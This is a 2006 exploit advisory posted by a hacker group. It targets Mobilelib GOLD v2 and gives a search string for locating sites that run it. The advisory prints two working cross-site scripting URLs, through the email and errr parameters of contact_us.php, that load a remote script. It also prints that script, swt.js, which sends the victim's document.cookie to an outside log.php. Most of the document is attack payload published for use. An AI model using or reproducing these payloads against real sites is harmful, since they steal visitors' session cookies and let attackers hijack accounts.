/////////////////////////////////////
// XSS in script Mobilelib GOLD v2 //
////////////////////////////////////
Found By: viP HaCKEr
Tame : AL-GaRNi
Vendor: http://www.ac4p.com
Software: Mobilelib GOLD GOLD v2
google : "Powered by ac4p.com"
::::::::::::::::::::::::::::::::::::::
Description:

Line 32 of contact_us.php
:::::::::::::::::::::::::::::::::::::
code:
}
$html=getthemeM("show.tpl");
$html=eregi_replace("{marquee}","$Newnews",$html);
include("block.php");
$errr='';
function chek_mail($email)
   {
::::::::::::::::::::::::::::::::::::::
Exploits :

http://[target]/[path]/contact_us.php?email=%20%22%3E%3Cscript%20src%3Dhttp%3A//www.xxxx.com/swt.js%3E%3C/script%3E  #

//and

http://[target]/[path]/contact_us.php?errr=%20%22%3E%3Cscript%20src%3Dhttp%3A//www.xxxx.com/swt.js%3E%3C/script%3E   #
/****************************************************************//
//Content swt.js
location.href='http://www.yoursite.com/log.php?swt='+escape(document.cookie);  #

//End swt.js
############### Group AL-GaRNi ##################
/**********************************************#
/*SwEET-DeViL  &  viP HaCkEr  &   HaCkEr sUn *#
/********************************************#
#################(c)@2006####################
########## gamr-14@hotmail.com #############
########## Error-404@hotmail.com ##########
##########################################